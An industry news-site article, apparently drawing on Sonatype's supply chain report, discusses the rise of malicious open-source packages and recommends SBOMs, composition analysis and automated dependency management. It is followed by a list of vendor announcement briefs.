Check Point® Software Technologies Ltd.(link is external) announced that its Quantum Firewall Software R82 — the latest version of Check Point’s core network security software delivering advanced threat prevention and scalable policy management — has received Common Criteria EAL4+ certification, further reinforcing its position as a trusted security foundation for critical infrastructure, government, and defense organizations worldwide.
The explosion of open source software consumption, combined with the increasing backlog of critical vulnerabilities and the rise of outside threats, paints an alarming picture of the current state of software supply chain security. Sonatype's State of the Software Supply Chain Report highlights the biggest issues plaguing development teams, revealing how cyber attacks are evolving and emphasizing the need for better defense.
The Current Software Supply Chain Security Landscape
Open source is experiencing a time of unprecedented growth, with an estimated 6.6 trillion downloads of open source packages at the end of 2024. However, this surge in consumption also brings a host of new threats. With open source accounting for up to 90% of modern software applications(link is external), the software supply chain has become a primary target for bad actors. For example, at the same time the JavaScript ecosystem has experienced a 70% year-over-year increase in requests, it has also seen a 156% year-over-year increase in malicious packages — totaling more than 512,847 in the past year alone.
This is just one example of the urgent need for greater risk mitigation within software development. The problem contributing to this persistent risk is two-fold. First, there is a lack of discipline in selecting and managing open source components. Despite updated versions available for over 99% of packages, 80% of application dependencies remain un-upgraded for over a year. On top of that, when vulnerable components are consumed, a fixed version already exists 95% of the time. Second, traditional scanning tools and endpoint security products cannot detect new open source malware, meaning DevOps teams often aren't even aware they're at risk until malware is already present in their build environments.
As threats continue to increase, organizations must mitigate them proactively. This starts with developers adopting a "security-first" mindset, one that prioritizes responsible dependency management, leverages advanced tools and focuses on earlier intervention. Doing so is the only way to minimize risk before it's too late.
The Need For Proactive Dependency Management
Organizations must prioritize proactive dependency management, high-quality component selection and vigilance against vulnerabilities to mitigate escalating risks. A Software Bill of Materials (SBOM) is an essential tool in this approach, as it offers a comprehensive inventory of all software components, enabling organizations to quickly identify and address vulnerabilities across their dependencies. In fact, projects that implement an SBOM to manage open source software dependencies demonstrate a 264-day reduction in the time taken to fix vulnerabilities compared to those that do not. SBOMs provide a comprehensive list of every component within the software, enabling quicker response times to threats and bolstering overall security.
However, despite the rise in SBOM usage, it is not keeping pace with the influx of new components being created, highlighting the need for enhanced automation, tooling and support for open source maintainers. In the past year, 60,813 SBOMs were published while 6,971,092 new components were created within the same timeframe, which demonstrates the critical gap in software transparency that exacerbates risks from unmanaged dependencies and persistent vulnerabilities.
This complacency — characterized by a false sense of security — accumulates risks that threaten the integrity of software supply chains. The rise of open source malware further complicates the landscape, as attackers exploit poor dependency management. Recent malicious npm packages, for example, concealed macOS malware in travis.yml files, deploying binaries disguised as legitimate updates. These incidents show how attackers use public repositories to infiltrate development environments. To secure their environments effectively, software manufacturers must adopt rigorous practices and advanced tooling.
Best Practices for Reliable Dependency Management
Despite the increasing challenges, there is a light at the end of the tunnel. While not a silver bullet, proactive dependency management can reduce many of these risks if a few best practices are followed:
■ Focus on High-Quality Components: Prioritize high-quality open source components. Projects supported by recognized foundations exhibit better security practices and fewer vulnerabilities.
■ Leverage Intelligent Software Composition Analysis (SCA): Implementing intelligent SCA tools can enhance developer efficiency and risk management without altering workflows.
■ Utilize Automation to Enhance Collaboration and Save Developer Time: Implement scalable automation for dependency management to reduce conflicts between security and engineering teams, freeing up to 5% of engineering capacity. By updating components only when necessary, automation minimizes false positives, reduces noise and saves valuable developer time.
■ Integrate Advanced Reachability Analysis: Combining reliable automation with advanced reachability analysis empowers developers to produce high-quality software more quickly. This approach enables security teams to focus on actionable vulnerabilities, further enhancing overall security.
■ Make SBOM Practices Standard: Implementing SBOMs as a core practice provides visibility into software components, essential for quickly identifying and remediating vulnerabilities. Organizations should treat SBOM management as a fundamental part of their security protocols.
By prioritizing better dependency management, organizations can significantly improve their security posture and operational efficiency, ensuring they remain competitive and resilient against evolving threats to the software supply chain.
Industry News
Postman announced full support for the Model Context Protocol (MCP), helping users build better AI Agents, faster.
Opsera announced new Advanced Security Dashboard capabilities available as an extension of Opsera's Unified Insights for GitHub Copilot.
Lineaje launched new capabilities including Lineaje agentic AI-powered self-healing agents that autonomously secure open-source software, source code and containers, Gold Open Source Packages and Gold Open Source Images that enable organizations to source trusted, pre-fixed open-source software, and a software crawling and analysis engine, SCA360, that discovers and contextualizes risks at all software development stages.
Check Point® Software Technologies Ltd.(link is external) launched its inaugural AI Security Report(link is external) at RSA Conference 2025.
Lenses.io announced the release of Lenses 6.0, enabling organizations to modernize applications and systems with real-time data as AI adoption accelerates.
Sonata Software has achieved Amazon Web Services (AWS) DevOps Competency status.
vFunction® announced significant platform advancements that reduce complexity across the architectural spectrum and target the growing disconnect between development speed and architectural integrity.
Sonatype® introduced major enhancements to Repository Firewall that expand proactive malware protection across the enterprise — from developer workstations to the network edge.
Aqua Security introduced Secure AI, full lifecycle security from code to cloud to prompt.
Salt Security announced the launch of the Salt Model Context Protocol (MCP) Server, giving enterprise teams a novel access point of interaction with their API infrastructure, leveraging natural language and artificial intelligence (AI).
The Cloud Native Computing Foundation® (CNCF®), which builds sustainable ecosystems for cloud native software, announced the graduation of in-toto, a software supply chain security framework developed at the NYU Tandon School of Engineering.
SnapLogic announced the launch of its next-generation API management (APIM) solution, helping organizations accelerate their journey to a composable and agentic enterprise.
Apiiro announced Software Graph Visualization, an interactive map that enables users to visualize their software architectures across all components, vulnerabilities, toxic combinations, blast radius, data exposure and material changes in real time.
Check Point® Software Technologies Ltd.(link is external) and Illumio, the breach containment company, announced a strategic partnership to help organizations strengthen security and advance their Zero Trust posture.